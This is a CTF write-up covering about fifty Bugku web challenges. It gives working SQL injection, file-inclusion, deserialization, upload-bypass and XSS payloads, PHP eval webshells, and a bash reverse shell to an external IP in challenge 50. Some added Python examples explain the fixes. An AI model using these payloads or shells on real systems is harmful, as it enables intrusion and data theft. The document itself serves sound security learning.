Bugku writeup(Web)

2018/07/27 CTF

I have been working through the Bugku challenges lately; they are quite friendly to an entry-level CTF player like me, so I am writing them up here. Below are just the tips, tricks or payloads, mainly for the web challenges. Continuously updated...

1.web2

tips:

Just view the page source.

2.文件上传测试

tips:

Upload a PHP file and change Content-Type: text/php to Content-Type: image/jpeg.

3.计算器

tips:

Change the maxlength attribute of the input field.

4.web基础$_GET

payload:

?what=flag

5.web基础$_POST

tips:

Remember to set the header to Content-Type: application/x-www-form-urlencoded.

6.矛盾

payload:

index1.php?num=1a

7.web3

tips:

View the source; the answer is hidden in HTML character entities.

8.sql注入

tips:

View the source: the gb2312 charset suggests a wide-byte injection.

After that it is the most ordinary SQL injection routine.

payload:

?id=1%df%27 union select 1,string from `key` where id=1%23
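Why the %df%27 trick works, and what closes the gap: the following is an added example, not code from the original writeup. It models PHP-style byte-wise escaping (a toy stand-in for addslashes()) and lets Python's GBK codec play the role of the connection charset the gb2312 hint points at; the query text and input bytes are constructed. The lesson for the defender is the order of operations: decode in the connection charset first (or use bound parameters), then escape.

```python
import re

# Added example (not from the original writeup). Toy stand-ins for PHP's
# addslashes()/mysql_real_escape_string(); no real database is involved.

def addslashes_bytes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes(): it knows nothing about
    multibyte charsets, so it blindly puts 0x5c before every 0x27."""
    out = bytearray()
    for b in data:
        if b in (0x00, 0x22, 0x27, 0x5C):
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def vulnerable_query(user_input: bytes, charset: str) -> str:
    """Escape the raw bytes first, then let the server decode the SQL text
    in the connection charset: the order the vulnerable app uses."""
    escaped = addslashes_bytes(user_input)
    return "select * from t where id='" + escaped.decode(charset, "replace") + "'"

def escape_text(text: str) -> str:
    """Character-level escaping of an already decoded string."""
    return text.replace("\\", "\\\\").replace("'", "\\'")

def safe_query(user_input: bytes, charset: str) -> str:
    """Decode in the connection charset FIRST, then escape characters.
    This is what a charset-aware escaper (or a bound parameter) achieves."""
    text = user_input.decode(charset, "replace")
    return "select * from t where id='" + escape_text(text) + "'"

def live_quote_count(query: str) -> int:
    """Count single quotes not escaped by a preceding backslash.
    A well-formed query with one string literal has exactly two."""
    return len(re.findall(r"(?<!\\)'", query))

# Constructed input: the bytes that ?id=1%df%27 delivers to the script.
WIDE_BYTE_INPUT = b"1\xdf'"

def demo() -> dict:
    return {
        # under latin-1 the backslash survives and the quote stays escaped
        "latin1_live_quotes": live_quote_count(vulnerable_query(WIDE_BYTE_INPUT, "latin-1")),
        # under GBK the bytes 0xDF 0x5C fuse into one character, the
        # backslash is swallowed and the quote terminates the literal
        "gbk_live_quotes": live_quote_count(vulnerable_query(WIDE_BYTE_INPUT, "gbk")),
        # decoding before escaping keeps the literal intact
        "gbk_safe_live_quotes": live_quote_count(safe_query(WIDE_BYTE_INPUT, "gbk")),
    }

if __name__ == "__main__":
    print(demo())
```

A third live quote in the GBK case is the whole vulnerability: everything after it is parsed as SQL. In PHP the equivalent fix is mysqli_set_charset() before escaping, or better, prepared statements.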

9.域名解析

tips:

Edit the local hosts file.

10.SQL注入1

tips:

Think about the strip_tags() function: %3C%3E <==> <>

11.你必须让他停下

tips:

Disable JavaScript in the browser, view the source and refresh a few times to get the flag.

12.本地包含

payload:

<1> hello=);print_r(file("flag.php")
<2> hello=);var_dump(file("flag.php")
<3> hello=file("flag.php")
<4> hello=);include(@$_POST['b']
    In the POST body: b=php://filter/convert.base64-encode/resource=flag.php
<5> hello=);include("php://filter/convert.base64-encode/resource=flag.php"

13.变量1

payload:

/index1.php?args=GLOBALS

14.web5

tips:

The challenge hints at JSFuck.

Just decode it.

15.头等舱

tips:

The title is the hint: look at the response headers.

16.网站被黑

tips:

A hacked site must have a webshell: scan the site's directories to find the webshell path, then brute-force the webshell password.

16+1 管理员系统

The challenge omits the account's password; other writeups reveal it is test123.

The rest is a simple XFF (X-Forwarded-For) trick.

17.web4

tips:

View the source, URL-decode it and skim the JS; then the challenge is solvable.

18.flag在index里

payload:

http://120.24.86.145:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php

19.输入密码查看flag

tips:

Brute-force with Burp Suite.

20.点击一百万次

The key part is this JS:

var form = $('<form action="" method="post">' +
    '<input type="text" name="clicks" value="' + clicks + '" hidden/>' +
    '</form>');
$('body').append(form);
form.submit();

tips:

POST x...xx

clicks=1000001

21.备份是个好习惯

tips:

1. Backup file source leak (backup files usually have .swp or .bak appended to the file name).

2. Loose type comparison, bypassed through md5.

22.成绩单

payload:

step1: find the injection point

  1. 1' shows nothing: suspect an injection point here

  2. 1' or 1=1# displays normally: clearly an injection point

step2: determine the column count

  1. 1' order by 5# shows nothing, so the column count is not 5

  2. 1' order by 4# displays normally, so there are 4 columns

step3: see which columns are echoed

  1. -1' union select 1,2,3,4# shows which columns are displayed

step4: the rest is the standard SQL injection routine

  1. -1' union select 1,2,3,database()# current database -> skctf_flag
  2. -1' union select 1,2,3,table_name from information_schema.tables where table_schema='skctf_flag'# table name -> fl4g
  3. -1' union select 1,2,3,column_name from information_schema.columns where table_schema='skctf_flag' and table_name='fl4g'# column name -> skctf_flag
  4. With the table and column names known, query the target data directly: -1' union select 1,2,3,skctf_flag from fl4g#

23.秋名山老司机

payload:

#encoding:utf-8
import requests
from bs4 import BeautifulSoup

# One session, so the server-side state set by the GET is still there
# when the answer is POSTed back.
r = requests.Session()

url = "http://120.24.86.145:8002/qiumingshan/"
response = r.get(url)
soup = BeautifulSoup(response.text, "html.parser")

# The arithmetic expression is in the first <div>; its last three
# characters are not part of the expression and are stripped before
# evaluating it.
divList = soup.find_all("div")
post = eval(divList[0].string[:-3])
data = {"value": post}
print(data)
flag = r.post(url, data=data)

print(flag.text)

24.速度要快

#encoding:utf-8
import requests
import base64

url = "http://120.24.86.145:8002/web6/"
r = requests.Session()
response = r.get(url)
# The key arrives base64-encoded in the "flag" response header...
flag = response.headers['flag']
key = base64.b64decode(flag)
key = str(key, encoding="utf-8")
print(key)

# ...and the word after the space is base64-encoded once more.
key = key.split(" ")[1]
key = str(base64.b64decode(key), encoding="utf-8")
print(key)

# Post it straight back within the same session (the title says: be fast).
data = {"margin": key}
response = r.post(url, data=data)
print(response.text)

25.cookies欺骗

tips:

1. Retrieve the source of index.php:

#encoding:utf-8
import requests

# filename is base64("index.php"); line selects one source line per request.
url = "http://120.24.86.145:8002/web11/index.php?line={0}&filename=aW5kZXgucGhw"
r = requests.Session()

ans = ""
for i in range(20):
    response = r.get(url.format(i))
    ans += response.text

print(ans)

2. Read the source and craft the cookie accordingly.

26.XSS

tips:

< and > are filtered; Unicode escapes get around the filter. The idea:

\u003c\u003e in place of < >

payload:

id=\u003cscript\u003ealert(__key__)\u003c/script\u003e

27.never give up

https://pengyang.me/2018/08/13/bk_ng/

28.welcome to bugkuctf

tips:

step1:

GET /test1/?txt=php://input&file=php://filter/convert.base64-encode/resource=hint.php 

welcome to the bugkuctf
<?php

class Flag{//flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("good");
        }
    }
}
?>

step2:

GET /test1/?txt=php://input&file=php://filter/convert.base64-encode/resource=index.php 

welcome to the bugkuctf
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
    echo "hello friend!<br>";
    if(preg_match("/flag/",$file)){
        echo "不能现在就给你flag哦";
        exit();
    }else{
        include($file);
        $password = unserialize($password);
        echo $password;
    }
}else{
    echo "you are not the number of bugku ! ";
}

?>

<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
    echo "hello admin!<br>";
    include($file); //hint.php
}else{
    echo "you are not admin ! ";
}
 -->

We already got past the first if; to get past the second one and into the else branch, we use PHP's deserialization behaviour: the unserialized object's __toString() reads whatever file is named in its file property.

payload:

<?php
class Flag{//flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("good");
        }
    }
}

$flag = new Flag();
$flag->file = "flag.php";
echo serialize($flag);
?>
/test1/?password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}&file=hint.php&txt=php://input

29.过狗一句话

Use assert to execute arbitrary code.

payload: http://120.24.86.145:8010/?s=print_r(scandir('./')); (lists the directory)

Reference: PHP code/command execution vulnerabilities

30.字符?正则?

tips:

<?php 
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

It comes down to matching this regular expression:

/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i

keykeyaaaaakey:/a/keyb,

31.前女友(SKCTF)

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

1. Loose-comparison bypass

2. strcmp bypass

payload:

/?v1[]=1&v2[]=2&v3[]=3

32.login1(SKCTF)

tips:

step1: register first

username: admin...(spaces)...1
password: PASSword1

step2: log in directly

username: admin
password: PASSword1

33.你从哪里来

tips:

Referer: https://www.google.com

34.md5 collision(NUPT_CTF)

tips:

The title says it all: a loose type-comparison flaw.

/md5.php?a=240610708
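Why 240610708 works, as an added example that is not part of the original writeup: under PHP's loose `==`, two strings that both look numeric are compared as numbers, and an md5 digest of the form "0e" followed only by digits is scientific notation for zero. The Python below models that one rule (the "0e" case) and checks the digests of the inputs the page and the well-known QNKCDZO string give; the fix on the PHP side is `===` or hash_equals(), which the strict function here stands for.

```python
import hashlib
import re

# Added example (not from the original writeup): model of the PHP `==`
# quirk behind challenges 21, 31 and 34, plus a detector for "magic" digests.

MAGIC = re.compile(r"^0e\d+$")

def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode()).hexdigest()

def is_magic_hash(hex_digest: str) -> bool:
    """True when PHP would parse the digest as the number 0.0 ("0e" + digits)."""
    return bool(MAGIC.match(hex_digest))

def php_loose_equal_md5(a: str, b: str) -> bool:
    """Model of md5($a) == md5($b) under PHP loose comparison, for the
    numeric-string case only: two magic digests both become 0.0 and compare
    equal; anything else falls back to plain string equality."""
    ha, hb = md5_hex(a), md5_hex(b)
    if is_magic_hash(ha) and is_magic_hash(hb):
        return True
    return ha == hb

def php_strict_equal_md5(a: str, b: str) -> bool:
    """md5($a) === md5($b): byte-for-byte comparison, no numeric coercion."""
    return md5_hex(a) == md5_hex(b)

def find_magic(candidates) -> list:
    """Return the inputs whose md5 digest is a magic hash (useful for
    auditing a word list or test fixture)."""
    return [c for c in candidates if is_magic_hash(md5_hex(c))]

if __name__ == "__main__":
    for word in ("240610708", "QNKCDZO", "hello"):
        print(word, md5_hex(word), is_magic_hash(md5_hex(word)))
```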

35.程序员本地网站

tips:

X-Forwarded-For:127.0.0.1

36.各种绕过

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])
        print 'passwd can not be uname.';
    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
        die('Flag: '.$flag);
    else
        print 'sorry!';
}
?>

payload:

POST /web7/?id=margin&uname[]=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded

passwd[]=1

A SHA1 collision would also work.

37.web8

<?php
extract($_GET);
if (!empty($ac))
{
    $f = trim(file_get_contents($fn));
    if ($ac === $f)
    {
        echo "<p>This is flag:" ." $flag</p>";
    }
    else
    {
        echo "<p>sorry!</p>";
    }
}
?>
GET /web8/?ac=test&fn=php://input HTTP/1.1

test

38.细心

tips:

robots.txt

/resusl.php?x=admin

39.求getshell

Change the file extension to get the flag; the PHP alias extensions:

php2, php3, php4, php5, phps, pht, phtm, phtml …
Content-Type: Multipart/form-data;

-----------------------------160788178818824807152124289401
Content-Disposition: form-data; name="file"; filename="test.php5"
Content-Type: image/jpeg

<?php
echo "hack";
?>
-----------------------------160788178818824807152124289401
Content-Disposition: form-data; name="submit"

Submit
-----------------------------160788178818824807152124289401--

If the WAF does strict matching, changing the case of letters in the Content-Type value can bypass the check so the upload reaches the server; servers are fairly tolerant, so the uploaded file will usually still be parsed.

40.INSERT INTO注入

<?php
error_reporting(0);

function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
?>

Tips: XFF (X-Forwarded-For) injection, time-based blind.

select case when <condition> then <expr1> else <expr2> end

substr(X,1,1) can also be written as substr(X from 1 for 1)

payload

11'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))%23


Dump the database name:

#encoding: utf-8
import requests
import string

mystring = string.ascii_letters + string.digits + string.punctuation
url = 'http://120.24.86.145:8002/web15/'
# Sent via X-Forwarded-For: a correct guess makes the server sleep 5 s,
# which trips the 4 s client timeout and so confirms the character.
data = "'+(select case when (substring((select database() ) from {0} for 1)='{1}') then sleep(5) else 1 end)) #"
flag = ''

for i in range(1, 10):
    for j in mystring:
        try:
            headers = {'x-forwarded-for': data.format(str(i), j)}
            requests.get(url, headers=headers, timeout=4)
        except requests.exceptions.ReadTimeout:
            flag += j
            print(flag)
            break

print('The database name is ' + flag)
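The root cause in getIp() above is that an attacker-controlled header goes straight into an INSERT. As an added example (not code from the original writeup), here is the same logic hardened in Python: accept X-Forwarded-For only when the request came from a known proxy, validate the value as an IP literal, and hand it to the database as a bound parameter. The proxy address, the sample requests and the `execute` callback are constructed stand-ins for real infrastructure.

```python
import ipaddress

# Added example (not from the original writeup): hardened counterpart of
# the writeup's getIp() + INSERT. Constructed values throughout.

TRUSTED_PROXIES = {"10.0.0.5"}   # constructed: address of our reverse proxy


def client_ip(headers: dict, remote_addr: str) -> str:
    """Return the client IP to log; raise ValueError if it is not an IP literal."""
    xff = headers.get("X-Forwarded-For")
    candidate = remote_addr
    if xff and remote_addr in TRUSTED_PROXIES:
        # only a trusted proxy may speak for the client; first hop is the client
        candidate = xff.split(",")[0].strip()
    # ipaddress rejects anything that is not a plain IPv4/IPv6 address
    return str(ipaddress.ip_address(candidate))


def record_ip(headers: dict, remote_addr: str, execute) -> bool:
    """Log the visitor's IP with a parameterised statement. Returns False
    (and logs nothing) when the header does not carry a valid address."""
    try:
        ip = client_ip(headers, remote_addr)
    except ValueError:
        return False
    # placeholders, never string formatting: the driver quotes the value
    execute("insert into client_ip (ip) values (%s)", (ip,))
    return True


# Constructed sample requests; the third carries the time-based payload
# shown earlier in this section.
SAMPLES = [
    ({"X-Forwarded-For": "203.0.113.9"}, "10.0.0.5"),
    ({"X-Forwarded-For": "203.0.113.9"}, "198.51.100.7"),  # not via our proxy
    ({"X-Forwarded-For": "11'+(select case when substr((select flag from flag) "
                         "from 1 for 1)='a' then sleep(5) else 0 end))#"}, "10.0.0.5"),
]


def run_samples() -> tuple:
    """Feed the samples through record_ip with a fake cursor; returns the
    per-request outcomes and the values that actually reached the database."""
    logged = []

    def fake_execute(sql, params):
        logged.append(params[0])

    results = [record_ip(h, r, fake_execute) for h, r in SAMPLES]
    return results, logged


if __name__ == "__main__":
    print(run_samples())
```

The second sample shows the proxy check doing its job: a forwarded header from an unknown hop is ignored and REMOTE_ADDR is logged instead. The third never reaches the database at all, which is also the point at which a WAF or application log would flag it.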

41.这是一个神奇的登陆框

tips:

step1:

admin_name=admin&admin_passwd=1" order by 2#&submit=GO+GO+GO

step2:

admin_name=admin&admin_passwd=1" union select database(),2#&submit=GO+GO+GO

From here on it is the usual injection technique.

42.多次

https://pengyang.me/2018/08/03/bk_dc/

43.PHP_encrypt_1(ISCCCTF)

Encrypted data:

fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=

Encryption algorithm:

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $char = "";
    $str = "";
    $len = strlen($data);
    $klen = strlen($key);
    // repeat the key until it covers the whole plaintext
    for ($i=0; $i < $len; $i++) {
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    // add the key byte to each plaintext byte, mod 128
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

tips:

Just write the matching decryption routine:

<?php

function decrypt($str){
    $str = base64_decode($str);
    $len = strlen($str);
    $key = md5('ISCC');
    $klen = strlen($key);
    $x = 0;
    $char = "";
    $flag = "";
    // rebuild the same repeated keystream encrypt() used
    for ($i=0; $i < $len; $i++) {
        if ($x == $klen){
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    // encrypt() added the key byte mod 128, so subtract it mod 128
    for ($i=0; $i<$len ; $i++) {
        $flag .= chr((ord($str[$i]) - ord($char[$i]) + 128) % 128);
    }
    return $flag;
}


$s = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";

$res = decrypt($s);
echo $res;
?>
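The same cipher and its inverse in Python, as an added example that is not part of the original writeup: it makes the roundtrip property explicit (addition mod 128 is undone by subtraction mod 128, no case split on the sign needed) and decrypts the challenge ciphertext. The key is md5('ISCC') exactly as in the PHP above; the sample plaintext is constructed.

```python
import base64
import hashlib

# Added example (not from the original writeup): Python port of the ISCC
# encrypt() routine and its inverse. Key and ciphertext are the page's own.

KEY = hashlib.md5(b"ISCC").hexdigest()   # 32 hex characters, as in the PHP

def keystream(length: int) -> bytes:
    """Cycle the key over the message length (the first loop in encrypt())."""
    return (KEY * (length // len(KEY) + 1))[:length].encode("ascii")

def encrypt(data: str) -> str:
    """Plaintext must be 7-bit ASCII: the mod 128 drops anything higher."""
    raw = data.encode("ascii")
    ks = keystream(len(raw))
    out = bytes((p + k) % 128 for p, k in zip(raw, ks))
    return base64.b64encode(out).decode("ascii")

def decrypt(token: str) -> str:
    raw = base64.b64decode(token)
    ks = keystream(len(raw))
    # (p + k) mod 128 is inverted by (c - k) mod 128; Python's % is already
    # non-negative, so the abs()/+128 juggling from the PHP is unnecessary
    out = bytes((c - k) % 128 for c, k in zip(raw, ks))
    return out.decode("ascii")

CIPHERTEXT = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="

def ciphertext_length() -> int:
    """Length in bytes of the challenge ciphertext (and so of the plaintext)."""
    return len(base64.b64decode(CIPHERTEXT))

if __name__ == "__main__":
    print(decrypt(CIPHERTEXT))
```

Note what the scheme is: a repeating-key addition with a fixed, public key, so anyone holding the code can decrypt. It is obfuscation, not encryption; the PHP `$key` parameter is even overwritten inside the function.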

44.文件包含2

tips:

//shell.jpg
<script language=php>system("ls")</script>

//shell.jpg
<script language=php>echo "test";eval($_POST['shell']);</script>
Connect to it with China Chopper (菜刀):
http://118.89.219.210:49166/index.php?file=upload/201808160804143541.jpg

Reference: File Inclusion 2 (文件包含2)

45.flag.php

tips: another deserialization challenge.

<?php 
error_reporting(0); 
include_once("flag.php"); 
$cookie = $_COOKIE['ISecer']; 
if(isset($_GET['hint'])){ 
    show_source(__FILE__); 
} 
elseif (unserialize($cookie) === "$KEY") 
{    
    echo "$flag"; 
} 
else { 
?>
<?php 
} 
$KEY='ISecer:www.isecer.com'; 
?>

$KEY is empty at the point of the comparison: it is only assigned further down.

Build the payload:

<?php
	$ISecer = '';
	echo  serialize($ISecer);
?>
//s:0:"";
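For reading the two serialized strings above (the Flag object in 28.welcome to bugkuctf and the empty string here), an added example that is not part of the original writeup: a small writer for PHP's serialize() format in Python. It covers the scalar and object/array forms these challenges use, with string lengths as byte counts as PHP computes them. The point for a defender is how little the text carries: class name and property values come verbatim from the caller, which is why unserialize() on a cookie or GET parameter is unsafe.

```python
# Added example (not from the original writeup): a PHP serialize() writer
# for the value types seen in challenges 28 and 45.

def php_serialize(value, class_name=None) -> str:
    """Serialize a Python value the way PHP serialize() would.
    A dict with class_name given becomes an object (O:...), a plain dict an
    array (a:...). String lengths are byte lengths, as in PHP."""
    if value is None:
        return "N;"
    if isinstance(value, bool):              # before int: bool is an int subclass
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, float):
        return "d:%s;" % repr(value)
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return 's:%d:"%s";' % (len(raw), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        if class_name is None:
            return "a:%d:{%s}" % (len(value), body)
        return 'O:%d:"%s":%d:{%s}' % (len(class_name), class_name, len(value), body)
    raise TypeError("unsupported type %r" % type(value))

if __name__ == "__main__":
    print(php_serialize({"file": "flag.php"}, class_name="Flag"))
    print(php_serialize(""))
```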

46.sql注入2

tips:

.DS_Store leak: .DS_Store is a file Mac OS X leaves behind in directories, and it may hold sensitive information about the directory's contents.

Use a .DS_Store extraction tool.

47.孙xx的博客

tips:

1. Information gathering, then log in to the WordPress admin backend;

2. Write a one-liner shell into a plugin file, then connect with AntSword (蚁剑) to get the flag.

48.报错注入

tips:

?id=1/**/and/**/updatexml(1,concat(0x7e,(select/**/@@version),0x7e),1)

?id=1/**/and/**/updatexml(1,concat(0x7e,substr(load_file(0x2f7661722f746573742f6b65795f312e706870),50,100),0x7e),1)

0x2f7661722f746573742f6b65795f312e706870
/var/test/key_1.php

49.Trim的日记本

tips:

/show.php

50.login2(SKCTF)

tips:

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
    /* After this query $row['password'] would yield two values: (1) admin's
       password; (2) md5(1). For only one value to come back, the username
       must not exist. */
}

Build the payload:

username=admin' union select md5(1),md5(1)#&password=1

Then pop a reverse shell:

|bash -i >& /dev/tcp/47.XXX.XXX.146/8888 0>&1

51.login3(SKCTF)

https://pengyang.me/2018/08/05/bk_login3/

52.文件上传2(湖湘杯)

payload:

/?op=php://filter/read=convert.base64-encode/resource=flag

52+1 SSI

Searching for SSI turns up this reference: https://blog.csdn.net/wutianxu123/article/details/82724637

payload:

<!--#include virtual="/etc/passwd" -->

参考:https://skysec.top/2018/11/16/EIS-2018-web/

52+2 江湖魔头

http://123.206.31.85:1616/wulin.php?action=start

View the source: there are three JS files, script.js, md5.js and base64.js.

//script.js
function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i].trim();
        if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
    }
    return ""
}

function decode_create(temp) {
    var base = new Base64();
    var result = base.decode(temp);
    var result3 = "";
    for (i = 0; i < result.length; i++) {
        var num = result[i].charCodeAt();
        num = num ^ i;
        num = num - ((i % 10) + 2);
        result3 += String.fromCharCode(num)
    }
    return result3
}

function ertqwe() {
    var temp_name = "user";
    var temp = getCookie(temp_name);
    temp = decodeURIComponent(temp);
    var mingwen = decode_create(temp);
    var ca = mingwen.split(';');
    var key = "";
    for (i = 0; i < ca.length; i++) {
        if (-1 < ca[i].indexOf("flag")) {
            key = ca[i + 1].split(":")[2]
        }
    }
    key = key.replace('"', "").replace('"', "");
    document.write('<img id="attack-1" src="image/1-1.jpg">');
    setTimeout(function () {
        document.getElementById("attack-1").src = "image/1-2.jpg"
    }, 1000);
    setTimeout(function () {
        document.getElementById("attack-1").src = "image/1-3.jpg"
    }, 2000);
    setTimeout(function () {
        document.getElementById("attack-1").src = "image/1-4.jpg"
    }, 3000);
    setTimeout(function () {
        document.getElementById("attack-1").src = "image/6.png"
    }, 4000);
    setTimeout(function () {
        alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}")
    }, 5000)
}

Focus on ertqwe().

Run the following in the browser console:

>var test = getCookie('user');
undefined
>test
"UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeHBoaZ1liZxQMWEFDXl8EdUUOCwwId016B34WUlFWWTVoATEAB3J5P3Z2CmYgPTY5Pj90FSUUFRkfL2ZnYnYhCRMTGRQPQCcHKFIvEShXUlYCGQMbDQ4FXEcXREo%2FBTzBxKbu6fbrB%2BH%2Bps3nsLrP6dCs0LgR8fj1%2F%2B6y3%2B%2FapJ3XnJnkjNPf0NnRjpPD7pjzzfaMiJDcxt%2FXkP%2FB%2BI2C5vTqgUE%3D"

>test = decodeURIComponent(test)
"UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeHBoaZ1liZxQMWEFDXl8EdUUOCwwId016B34WUlFWWTVoATEAB3J5P3Z2CmYgPTY5Pj90FSUUFRkfL2ZnYnYhCRMTGRQPQCcHKFIvEShXUlYCGQMbDQ4FXEcXREo/BTzBxKbu6fbrB+H+ps3nsLrP6dCs0LgR8fj1/+6y3+/apJ3XnJnkjNPf0NnRjpPD7pjzzfaMiJDcxt/XkP/B+I2C5vTqgUE="

>test = decode_create(test)
"O:5:"human":10:{s:8:"xueliang";i:822;s:5:"neili";i:548;s:5:"lidao";i:72;s:6:"dingli";i:97;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;s:6:"yelian";i:0;s:5:"money";i:0;s:4:"flag";s:1:"0";}"

Change the money value, then re-encode the cookie plaintext:

<?php
function encode($payload){
    $result = '';
    for ($i=0; $i < strlen($payload); $i++) {
        $b = ord($payload[$i]);
        $b = $b + (($i % 10) + 2);
        $b = $b ^ $i;
        $result = $result.chr($b);
    }
    return $result;
}
$payload = 'O:5:"human":10:{s:8:"xueliang";i:822;s:5:"neili";i:548;s:5:"lidao";i:72;s:6:"dingli";i:97;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;s:6:"yelian";i:0;s:5:"money";i:1000000;s:4:"flag";s:1:"0";}';
echo base64_encode(encode($payload));
//encodeURIComponent()
?>

// encode() is written this way to run the steps of decode_create() in reverse; repeated here:
function decode_create(temp) {
    var base = new Base64();
    var result = base.decode(temp);
    var result3 = "";
    for (i = 0; i < result.length; i++) {
        var num = result[i].charCodeAt();
        num = num ^ i;
        num = num - ((i % 10) + 2);
        result3 += String.fromCharCode(num)
    }
    return result3
}
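The encode/decode pair in Python, plus what the game was missing, as an added example that is not part of the original writeup: decode_create() and the author's encode() ported so the roundtrip can be asserted, and a constructed server-side cookie format that appends an HMAC tag over the obfuscated state. Changing money and re-encoding then fails verification. The byte-level handling of characters above 0x7f follows the author's PHP encode(); how the site's Base64 class treats them is not shown on the page and is assumed here, and SERVER_SECRET is a constructed value.

```python
import base64
import hashlib
import hmac

# Added example (not from the original writeup): Python ports of the page's
# decode_create() and encode(), plus a constructed HMAC-protected variant.

def decode_create(token: str) -> str:
    """Port of the site's decode_create(): base64, then per byte XOR with
    the index and subtract (index % 10) + 2. Bytes above 0x7f are taken
    as-is (assumption; the author's PHP does the same)."""
    raw = base64.b64decode(token)
    return "".join(chr((b ^ i) - ((i % 10) + 2)) for i, b in enumerate(raw))

def encode(plaintext: str) -> str:
    """Inverse of decode_create(), as in the author's PHP encode(). Exact
    only for inputs shorter than 256 bytes, since XOR with a larger index
    would no longer fit in one byte."""
    out = bytes(((ord(c) + ((i % 10) + 2)) ^ i) & 0xFF for i, c in enumerate(plaintext))
    return base64.b64encode(out).decode("ascii")

SERVER_SECRET = b"constructed-demo-secret"   # constructed; lives only on the server

def issue_cookie(state: str) -> str:
    """Obfuscated state plus an HMAC tag; the tag is what stops tampering."""
    body = encode(state)
    tag = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + tag

def load_cookie(cookie: str):
    """Return the state if the tag verifies, otherwise None."""
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return decode_create(body)

# The serialized state from the console transcript above (money still 0).
STATE = ('O:5:"human":10:{s:8:"xueliang";i:822;s:5:"neili";i:548;s:5:"lidao";i:72;'
         's:6:"dingli";i:97;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;'
         's:6:"yelian";i:0;s:5:"money";i:0;s:4:"flag";s:1:"0";}')

def tamper_demo() -> tuple:
    """(genuine cookie verifies, forged cookie result). The forgery re-encodes
    the state with a bigger wallet but can only keep the old tag."""
    cookie = issue_cookie(STATE)
    _, _, tag = cookie.rpartition(".")
    forged = encode(STATE.replace('s:5:"money";i:0;', 's:5:"money";i:1000000;')) + "." + tag
    return load_cookie(cookie) == STATE, load_cookie(forged)

if __name__ == "__main__":
    print(decode_create(encode(STATE)) == STATE, tamper_demo())
```

The obfuscation itself buys nothing once the JS is readable, which is exactly what the console session above demonstrates; an HMAC (or an opaque server-side session id) is the control that would have kept the wallet honest.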

53.login4

https://pengyang.me/2018/09/19/CBC/

That wraps up the web section; if new challenges appear, this post will be updated as well...

